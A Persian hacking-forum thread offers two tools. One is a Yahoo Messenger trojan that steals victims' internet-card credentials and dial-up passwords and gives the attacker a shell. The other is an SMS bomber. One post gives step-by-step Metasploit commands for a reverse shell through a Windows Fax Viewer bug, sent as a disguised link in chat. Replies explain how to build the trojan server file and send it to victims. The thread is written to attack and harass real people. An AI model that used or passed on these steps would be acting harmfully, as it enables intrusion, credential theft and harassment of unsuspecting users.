كدوم هارو منظورته كه كار نمي كردن بوتر ها؟نوشته شده توسط signal2006
چه نوع error به شما مي ده... فايل كم داره؟
![]()
كدوم هارو منظورته كه كار نمي كردن بوتر ها؟نوشته شده توسط signal2006
چه نوع error به شما مي ده... فايل كم داره؟
![]()
نسخه جديد برنامه ي iRcHaTaN Ps كه مانند نسخه قبلي در ياهو 7 كار ميكنيد البته با قابليت هاي جديد مثل ارسال (user,pass,number) كارت اينترنتي | dial up password و گرفتن شل( دسترسي كامل به كاميوتر قرباني)
![]()
در اين نسخه از برنامه قابليت ارسال password كارت هاي اينترنتي افزوده شده و هم چنين شما در اين نسخه ميتوانيد از قرباني شل بگيريد و كنترل كامل سيستم قرباني را به عهده بگيريد و هم چنين قابليت ارسال email با سيستم injection افزوده شده كه مي تواند از فايروال نيز عبور كرده و ايميل ارسال كند .pm ارسالي در اين نسخه توسط قرباني قابل رويت نيست و شما مي توتانيد از 2 mode ايميل و pm هم زمان استفاده كنيد .حتي اگر قرباني ياهو مسنجر نداشته باشد password كارت اينترت او براي شما ارسال مي شود و هم چنين مي توانيد از وي شل بگيريد. ديگر امكانات برنامه در عكس برنامه قابل رويت مي باشد و ما بقي در help برنامه موجود است.
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
![]()
هک از طریق چت بدون ازسال فایل
در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد
Metasploit framework
توجه : اگر قبلآ نسخه Metasploit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن بزنید set PAYLOAD win32_reverse و بعد ان
بزنید set HTTPHOST 217.216.30.40 و بعد آن
بزنید set LHOST 217.216.30.40
و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید . برای ارسال و گرفتن فایل هم می توانید به مقاله ی آموزشی که در سایت قرار داده شده رجوع کنید -
چون قربانی ممکن است به لینک شما شک کند و چون اینک ip شما است روی ان کلیک نکند .شما می توانید یک صفحه ی html از یک سایت به طور مثال یک صفحه از یک سایت .گالری عکس . جک و ... را save کنید و آن را با note pad باز کرده و کد زیر را در چند خط قبل انتهای آن past کنید.
موفق باشيد.![]()
Last edited by *AshKaN*; 08-04-2006 at 17:57.
نسخه جدید V 2.0 . iRcHaTaN Sms BOmber که مانند نسحه ی فبلی قابلیت ارسال sms به تعداد زیاد به طور مجانی را دارد . تنها کافی است که شماره موبایل قربانی را وارد کرده bomb را بزنید تا به تعداد مشخص شده توسط شما برایش sms بفرستد. متن این sms ها مانند نسخه ی قبلی عدد بوده و قابل تغیر نیست و برای مدت محدودی کارایی دارد .ممکن است sms ها با یک فاصله زمانی کم یک جا ارسال شوند
![]()
موفق باشيد.(نه در خراب كردن موبايل مردم... در زندگي تون
)
من امتحان کردم کار نکردنوشته شده توسط *AshKaN*
کسی از این برنامه نتیجه گرفته ؟
رو كدوم بد بخت امتحان كردي؟نوشته شده توسط papiyoon
![]()
![]()
من هم رو خودم امتحان کردم کار نکرد البته ایران نیستم نمیدونم این محدودیت رو داره یا نه
دوستان راهی سراغ دارین که بشه تشخیص داد لینکی که واست pm دادن ویروسی هستشیا به فایل سرور متصل شده؟؟
قبلا با نگاه کردن به لینک و دیدن ای پی جای اسم سایت میشد حدس زد ولی یه جا خوندم که میشه اینو هم دور زد یعنی کاری کرد که ای پی نشون نده بلکه ادرس یه سایت باشه
روی شماره خودم امتحان کردم دریغ از 1 دونه smsنوشته شده توسط *AshKaN*
![]()
![]()
اقا اشکان مثلا این irchatan-ps 7.1 را كه گذاشتي همه كاراشو ميكنم اين پيغام رو ميده server created successfully اگه ميشه بگين چكار كنم مرسي
عجب دل و جراتي باباروی شماره خودم امتحان کردم دریغ از 1 دونه sms![]()
خوب شما الان سرور رو با موفقيت ساختي ...نوشته شده توسط signal2006
حالا يه فايل ديگه به اون فايل هايي كه توي فولدر داشتي اضافه شده...
روي اون به هيچ وجه نبايد كليك كنين چون خودتون هك مي شين (البته به وسيله خودت)..
از help خيلي كمك ها مي توني بگيري..
حالا اون فايل رو به روش هاي مختلف مي توني براي طرف بفرستي...
و فلك زده رو هك كني...![]()
هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)